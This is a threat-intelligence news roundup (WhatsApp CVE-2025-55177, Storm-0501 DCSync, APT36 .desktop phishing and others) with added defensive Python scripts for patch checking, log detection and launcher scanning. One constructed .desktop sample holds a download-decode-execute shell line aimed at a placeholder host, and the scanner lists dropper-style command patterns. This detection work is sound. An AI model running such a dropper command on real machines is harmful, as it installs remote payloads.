Current Cyber Threats

WhatsApp Patches Vulnerability Exploited in Zero-Day Attacks

WhatsApp has addressed a "zero-click" security vulnerability (CVE-2025-55177) in its iOS and macOS clients. The flaw, which affects WhatsApp for iOS prior to v2.25.21.73 and WhatsApp for Mac prior to v2.25.21.78, allowed an attacker to remotely trigger the processing of content from an arbitrary URL on a target's device with no interaction from the victim. Because exploitation required nothing from the user, the only effective control is confirming that every managed device runs a fixed build.
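
The check a fleet administrator actually needs here is a version comparison against the fixed builds named above. The script below is an added example, not code from WhatsApp or from the original page; it assumes an MDM export in a three-column CSV (device id, platform, app version), and the inventory lines are constructed for illustration.

```python
# Added example: triage a (constructed) MDM inventory for WhatsApp builds
# still below the fixed versions for CVE-2025-55177.

# Fixed versions taken from the advisory summary above.
FIXED_VERSIONS = {
    "ios": (2, 25, 21, 73),
    "macos": (2, 25, 21, 78),
}


def parse_version(s: str) -> tuple:
    """Turn '2.25.21.73' into a tuple of ints. Comparing the raw strings
    would wrongly rank '2.25.9.1' above '2.25.21.73'."""
    parts = s.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"bad version string: {s!r}")
    return tuple(int(p) for p in parts)


def is_vulnerable(platform: str, version: str) -> bool:
    """True when the installed build is older than the fix for its platform.
    An unknown platform raises rather than silently passing as safe."""
    fixed = FIXED_VERSIONS[platform.lower()]
    installed = parse_version(version)
    # pad the shorter tuple with zeros so (2, 25, 21) compares as 2.25.21.0
    n = max(len(fixed), len(installed))
    installed = installed + (0,) * (n - len(installed))
    fixed = fixed + (0,) * (n - len(fixed))
    return installed < fixed


# Constructed inventory (device_id,platform,app_version); not real data.
SAMPLE_INVENTORY = """\
dev-001,ios,2.25.21.73
dev-002,ios,2.25.20.81
dev-003,macos,2.25.21.78
dev-004,macos,2.25.19.5
dev-005,ios,2.25.9.1
"""


def find_unpatched(csv_text: str) -> list:
    """Return the device ids whose WhatsApp build predates the fix."""
    flagged = []
    for line in csv_text.splitlines():
        if not line.strip():
            continue
        device, platform, version = line.split(",")
        if is_vulnerable(platform, version):
            flagged.append(device)
    return flagged


if __name__ == "__main__":
    for device in find_unpatched(SAMPLE_INVENTORY):
        print("update required:", device)
```

The padding step matters because some MDMs report three-component versions; without it a tuple of length three would compare as shorter and therefore "older" than any four-component fixed version regardless of its value.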


Velociraptor Incident Response Tool Abused for Remote Access

In August 2025, Sophos researchers analyzed an intrusion in which the attackers deployed Velociraptor, a legitimate open-source digital forensics and incident response tool. Rather than using it for defense, they abused Velociraptor to download and run Visual Studio Code with its tunneling feature enabled, most likely to open a remote connection back to their command-and-control infrastructure. The defensive takeaway is that an unexpected Velociraptor install, or one spawning interactive tooling such as VS Code, deserves the same scrutiny as an unknown remote-access agent.


Storm-0501 Hackers Shift to Ransomware Attacks in the Cloud

In a recently analyzed attack, Storm-0501 infiltrated a large enterprise made up of multiple subsidiaries with inconsistent Microsoft Defender coverage. After obtaining domain administrator access, the group performed reconnaissance to identify systems without endpoint protection, moved laterally with tools such as Evil-WinRM, and ran a DCSync attack to harvest privileged credentials by requesting directory replication as if it were a domain controller.
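
Two detection checks for the behaviours described in this item and in the Velociraptor item above, as an added example that is not code from Sophos, Microsoft or the original page. It assumes Windows security events have already been parsed into Python dicts with the field names used below, that the Properties field of a 4662 event has been split into its list of GUIDs, and that the set of domain controller computer accounts for the (hypothetical) domain is known. All event records are constructed, not captured from a real network.

```python
# Added example: two checks over constructed Windows security telemetry.
#   1. DCSync: Event ID 4662 where a principal that is not a domain
#      controller exercises a directory-replication control-access right.
#   2. Tool abuse: Event ID 4688 where velociraptor.exe is the parent of a
#      VS Code binary launched with the "tunnel" subcommand.
import re

# Control-access-right GUIDs for directory replication (Microsoft-documented
# extended rights; a legitimate DC uses them, a user account should not).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}

# Assumed DC machine accounts for this hypothetical domain; in practice
# populate from the Domain Controllers OU rather than hard-coding.
DOMAIN_CONTROLLER_ACCOUNTS = {"DC01$", "DC02$"}


def is_dcsync(event: dict) -> bool:
    """4662 carrying a replication right, requested by a non-DC principal."""
    if event.get("EventID") != 4662:
        return False
    props = {g.strip("{}").lower() for g in event.get("Properties", [])}
    if not (props & REPLICATION_RIGHTS):
        return False
    return event.get("SubjectUserName", "").upper() not in DOMAIN_CONTROLLER_ACCOUNTS


def is_vscode_tunnel_from_velociraptor(event: dict) -> bool:
    """4688: parent is Velociraptor, child is VS Code run with 'tunnel'."""
    if event.get("EventID") != 4688:
        return False
    parent = event.get("ParentProcessName", "").lower().rsplit("\\", 1)[-1]
    child = event.get("NewProcessName", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine", "").lower()
    return (parent == "velociraptor.exe"
            and child in {"code.exe", "code"}
            and re.search(r"\btunnel\b", cmd) is not None)


def triage(events: list) -> list:
    """Return (label, detail) pairs for every event that matches a check."""
    hits = []
    for e in events:
        if is_dcsync(e):
            hits.append(("dcsync", e["SubjectUserName"]))
        elif is_vscode_tunnel_from_velociraptor(e):
            hits.append(("vscode-tunnel", e["CommandLine"]))
    return hits


# Constructed records (not real logs): one benign DC replication, one DCSync
# by a service account, one unrelated 4662, one tunnel launch, one normal
# VS Code launch from Explorer.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"EventID": 4662, "SubjectUserName": "svc_backup",
     "Properties": ["{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]},
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": ["{bf967aba-0de6-11d0-a285-00aa003049e2}"]},
    {"EventID": 4688,
     "ParentProcessName": "C:\\Program Files\\Velociraptor\\velociraptor.exe",
     "NewProcessName": "C:\\Users\\Public\\code\\code.exe",
     "CommandLine": "code.exe tunnel --accept-server-license-terms"},
    {"EventID": 4688,
     "ParentProcessName": "C:\\Windows\\explorer.exe",
     "NewProcessName": "C:\\Program Files\\Microsoft VS Code\\code.exe",
     "CommandLine": "code.exe C:\\projects\\app"},
]

if __name__ == "__main__":
    for label, detail in triage(SAMPLE_EVENTS):
        print(f"{label}: {detail}")
```

The DCSync rule keys on who holds the replication right rather than on tooling, because Evil-WinRM, Mimikatz or any other client looks the same at the directory: a replication request from a principal that is not a domain controller. Keep the DC account list current, or the rule will fire on every normal replication cycle.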


ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies

Check Point Research identified a sophisticated social-engineering campaign, dubbed ZipLine, targeting U.S.-based manufacturing and other supply chain-critical companies. Instead of sending phishing emails directly, the attackers initiate contact through corporate "Contact Us" forms, so that the victim sends the first email; this inversion of the usual phishing flow makes the subsequent exchange look legitimate and sidesteps controls that key on unsolicited inbound mail.


UNC6384 Deploys PlugX via Captive Portal Hijacks and Valid Certificates Targeting Diplomats

In March 2025, Google Threat Intelligence Group identified a sophisticated cyber espionage campaign attributed to the PRC-nexus threat actor UNC6384. The campaign primarily targeted diplomats in Southeast Asia but also extended to other organizations worldwide, reflecting the broader strategic interests of the People's Republic of China.


Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing

An ongoing cyber-espionage campaign targeting Indian government entities has been attributed to the Pakistan-based threat group APT36 (Transparent Tribe). The group is using flexible tactics, including spear-phishing emails that deliver malicious .desktop shortcut files for initial access. On Linux desktops a .desktop file is a launcher whose Exec= line runs an arbitrary command when the file is opened, so a file disguised as a document can quietly fetch and execute a payload.
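
A triage scanner for .desktop launchers, as an added example that is not the actual APT36 artefact and not code from the original page. It assumes only the standard [Desktop Entry] key layout; the suspicious launcher below is constructed to illustrate the dropper pattern (shell wrapper, download, decode, background execution, document-style decoy name) and uses a non-routable example hostname.

```python
# Added example: flag Linux .desktop launchers whose Exec= line behaves
# like a dropper. Sample files are constructed, not real samples.
import re


def parse_desktop_entry(text: str) -> dict:
    """Minimal parser for the [Desktop Entry] group of a .desktop file.
    Only keys in that group decide what the launcher executes."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


# Patterns a launcher for a real application has no reason to contain.
SUSPICIOUS_EXEC = [
    r"\b(bash|sh|zsh)\s+-c\b",       # shell wrapper around a command string
    r"\b(curl|wget)\b",               # downloads a payload
    r"\bbase64\s+(-d|--decode)\b",   # decodes an embedded payload
    r"\b(python3?|perl)\s+-c\b",     # inline interpreter one-liners
    r"\bnohup\b|\bsetsid\b",          # detaches the payload from the launcher
]


def assess_desktop_file(text: str) -> list:
    """Return human-readable findings; an empty list means nothing matched."""
    entry = parse_desktop_entry(text)
    findings = []
    exec_line = entry.get("Exec", "")
    for pat in SUSPICIOUS_EXEC:
        if re.search(pat, exec_line):
            findings.append(f"Exec matches /{pat}/")
    # Terminal=false keeps the shell's output off-screen while it runs.
    if findings and entry.get("Terminal", "").lower() == "false":
        findings.append("Terminal=false hides the shell activity")
    # A launcher named or iconed like a document is the classic decoy.
    decoy = entry.get("Name", "") + " " + entry.get("Icon", "")
    if re.search(r"\.(pdf|docx?|xlsx?)\b", decoy, re.I):
        findings.append("Name/Icon impersonates a document")
    return findings


# Constructed suspicious launcher (hostname is non-routable by design).
SUSPICIOUS_SAMPLE = """\
[Desktop Entry]
Type=Application
Name=Circular_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://example.invalid/p | base64 -d > /tmp/.x; chmod +x /tmp/.x; nohup /tmp/.x &"
"""

# Constructed benign launcher for comparison.
BENIGN_SAMPLE = """\
[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
Terminal=false
"""

if __name__ == "__main__":
    for label, sample in (("suspicious", SUSPICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, assess_desktop_file(sample) or ["no findings"])
```

The Terminal=false check is deliberately conditional on an Exec finding: on its own it is normal for almost every graphical application, and only becomes interesting once the launcher is already doing shell work it has no business doing.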


Threat Spotlight: Split and Nested QR Codes Fuel New Generation of ‘Quishing' Attacks

Recent research shows attackers evolving their QR code phishing, or "quishing," tactics to stay ahead of security defenses. The basic lure, a QR code that sends the user to a credential-harvesting site, is well understood, but threat actors are now splitting a single code across several images or nesting one QR code inside another, techniques that defeat scanners which expect one clean code per image and so complicate detection and mitigation.


Lockbit Linux ESXi Ransomware Variant Evasion Techniques, File Encryption Process Uncovered

Hack & Cheese and Trend Micro researchers recently reverse-engineered the Linux variant of LockBit ransomware, which is built to target VMware ESXi servers. According to the analysis, the variant combines evasion techniques with an encryption scheme tailored to virtualized environments, making it a well-suited tool for actors going after ESXi hosts and the many guest machines each one hosts.